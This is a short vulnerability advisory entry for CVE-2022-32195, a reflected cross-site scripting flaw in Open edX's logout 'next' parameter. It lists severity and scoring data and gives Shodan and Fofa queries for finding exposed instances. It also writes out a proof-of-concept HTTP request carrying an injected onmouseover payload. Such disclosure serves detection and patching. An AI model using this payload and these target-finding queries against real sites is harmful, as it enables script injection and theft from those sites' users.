| Title | Open edX <2022-06-06 - Cross-Site Scripting |
|---|---|
| Author | arafatansari |
| Severity | Medium |
| Impact | Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. |
| Remediation | Apply the latest security patches or updates provided by Open edX to fix the Cross-Site Scripting vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.03276 |
| CVE ID | CVE-2022-32195 |
| CWE ID | CWE-79 |
| Shodan Query | http.html:"Open edX"http.html:"open edx" |
| Fofa Query | body="open edx" |
| Tags | cve cve2022 openedx xss edx vuln |
Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the ‘next’ parameter in the logout URL.
GET /logout?next=%208%22onmouseover=%22alert(document.domain) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2 rv:2.0; mai-IN) AppleWebKit/533.27.1 (KHTML, like Gecko) Version/5.0 Safari/533.27.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-32195.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-32195.pcap
N/AN/A